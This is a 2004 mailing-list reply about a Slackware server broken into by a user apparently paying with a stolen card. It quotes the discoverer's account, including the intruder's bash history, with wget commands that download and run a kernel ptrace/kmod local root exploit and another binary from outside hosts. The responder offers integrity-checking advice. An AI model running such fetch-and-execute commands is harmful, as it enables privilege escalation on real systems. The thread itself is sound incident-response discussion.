From: Alexander Economou (aecongnet.gr)
Date: Tue Jul 13 2004 - 03:57:41 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

0

 I think it would be best to contact the owner of the credit card first
and check if the charge in her card was made with her approval.

 Slackware is , if not the most , one of the most secure linux distros.You
said that the box has slack 10 installed wich is less than a month
old.Thus there are always unpublished 'ways' to get root access (wich in
your situation is needed to alter system files in the box) but from the
log you posted i dont think the particular person has anything to do with
this kind of information.

 A simple but not fast way to check the integrity of your box is by
installing slack10 to another box and compare the md5 checksums from
preinstalled files between the two boxes.

 A good idea also is considering finding a way (pam maybe?) to prevent
common users "consume" 100% of your cpu power.

> Hello
>
> I've had a rather disturbing evening.
> A friend of mine runs a small server for himself and some friends. It's
> running slackware 10.
> When I logged in, I noticed that the load was way over what's normal
> (around
> 1.36 now, usually it's under 0.10), so I run 'top'. I see a program called
> 'strace' running, hogging all the cpu power.
>
> So I get curious. I chdir to the users home, and looks around. It's empty.
> But, the 'smart' little cracker has forgotten about .bash_history, so here
> I
> can see everything that he has been doing.
> Aparently, he has downloaded and setup an eggdrop, removed it again, and
> then downloaded a psybnc, which he also removed shortly. Then things get
> interesting.
>
> <SNIP>
> wget http://personal.telefonica.terra.es/web/alexb/e/ptrace-kmod.c
> gcc ptrace-kmod.c -o ptrace
> ./ptrace
> chmod +x ptrace
> ./ptrace
> rm -rf ptrace
> ls
> rm -rf ptrace-kmod.c
> wget www.drac.as.ro/egx
> chmod +x egx
> ./egx
> who
> passwd
> Uptime
> <SNIP>
> ./egx
> rm -rf egx
> wget 220.88.27.11/usage/apache.tar.gz
> </SNIP>
>
> The ptrace-kmod.c has this for a header:
> /*
> * Linux kernel ptrace/kmod local root exploit
> *
> * This code exploits a race condition in kernel/kmod.c, which creates
> * kernel thread in insecure manner. This bug allows to ptrace cloned
> * process, allowing to take control over privileged modprobe binary.
> *
> * Should work under all current 2.2.x and 2.4.x kernels.
>
> Luckily, the server runs 2.6.6, so this wasn't any threat.
> The 'egx' executable seems to be somewhat like the other, cause when I run
> it, it outputs '[-] Unable to determine kernel address: Operation not
> supported' and dies.
>
> My guesses are that the apache.tar.gz-file is also some kind of exploit,
> but
> I couldn't get it, so I didn't get a chance to see.
>
> Seeing that he didn't know how to properly hide his tracks, I hoped he
> might
> be stupid enough to use his own IP to log in from as well, so I run 'cat
> /var/log/messages | grep <username>'.
> But, he has logged in and out using 7 different Ips. 5 belonging to
> Pakistan, and the other two to Libanon.
>
> I've been suspicious to this user since my friend added him a few days
> ago.
> He actually got a domain, prepaid for three years for an account, so I did
> have some concerns about this.
> Now, after discovering this, I've talked with my friend, and the credit
> card
> used to paying for the domain, belongs to a woman in the UK. Probably
> stolen
> or something.
>
> I've run chkrootkit 0.43 and Rootkit Hunter 1.1.1 and they didn't find
> anything.
> So, my real question is:
>
> Is there anything else I should check out? Anywhere else some nasty
> exploits
> or trojans might be hiding? And should I try to find this guy? Or is it
> probably hopeless?
>
> Best Regards,
> Per Christian B. Viken
>
> - --------------------------------------------
> _
> ASCII ribbon campaign ( )
> - against HTML email X
> & vCards / \
>
>
>

--
Alexander Economou
GNET NOC

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]